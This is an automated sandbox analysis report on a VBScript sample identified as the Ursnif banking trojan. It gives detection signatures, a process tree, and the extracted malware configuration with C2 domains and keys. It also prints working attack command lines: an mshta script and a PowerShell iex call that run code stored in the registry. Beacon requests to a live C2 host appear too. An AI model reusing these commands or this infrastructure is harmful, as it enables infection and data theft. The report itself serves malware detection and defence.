
Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: presentation[2021.09.09_15-26].vbs
Analysis ID: 482024
MD5: 783f03c1b5f346544c131ea2b164e54d
SHA1: 9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256: 683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Sigma detected: Encoded IEX
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6040 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 6484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 4180 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5552 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4504 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • WmiPrvSE.exe (PID: 4832 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 1372 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 3628 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4672 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2204 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6736 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
(21 matching memory dumps in total; the first five are listed here)

Unpacked PEs

Source | Rule | Description | Author
21.3.rundll32.exe.5838d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.578a4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.58094a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
21.3.rundll32.exe.578a4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4672, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', ProcessId: 2204
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132759974709312803.4672.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5; Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W; Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000015.00000003.1057194752.0000000004AB0000.00000040.00000001.sdmp; Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp; ReversingLabs: Detection: 55%
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_04BC3276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05E61802
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05E56E4E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80
Source: Traffic; Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 188.127.235.42 80
Source: global traffic; HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic; HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic; HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
